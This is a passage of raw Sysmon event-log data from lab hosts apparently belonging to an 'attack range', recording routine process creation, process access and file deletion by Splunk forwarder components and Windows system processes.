Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17532D6219E80FF6ABCD34859CB6DF2C,SHA256=EB3D49ACD15087B7FF44EACF508334C68D36316CBD1A72B4E4DC82DA8E85D017,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:19.919{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC27A6F45EC87C566F009805BD064E8,SHA256=F4CB5FE3ECFFBFD1F77B731639631BADDADE2B4B21C7CFCA8BEF4F1C0357275E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.901{C8EA50B7-12D3-6216-4605-000000003802}64046372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.400{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12D3-6216-4605-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.399{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.399{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.399{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.398{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.397{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-12D3-6216-4605-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.397{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12D3-6216-4605-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.396{C8EA50B7-12D3-6216-4605-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:20.935{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E01BAAF59C70336AA1A0EF6B03331098,SHA256=AD01D9F89E98E9797381FBC38D5A42941F91A2077A898C08C5888BFC1CC2E704,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.903{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12D4-6216-4805-000000003802}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.903{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.902{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.901{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.901{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-12D4-6216-4805-000000003802}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.899{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12D4-6216-4805-000000003802}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.898{C8EA50B7-12D4-6216-4805-000000003802}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.681{C8EA50B7-12D4-6216-4705-000000003802}41406428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12D4-6216-4705-000000003802}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-12D4-6216-4705-000000003802}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.279{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12D4-6216-4705-000000003802}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.281{C8EA50B7-12D4-6216-4705-000000003802}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:20.001{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8C96A951CE75CA349D1ACB3C2C1E386,SHA256=06456D4261DF41B914D47260414ED9616E36808418896B722922ECC45D47D9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 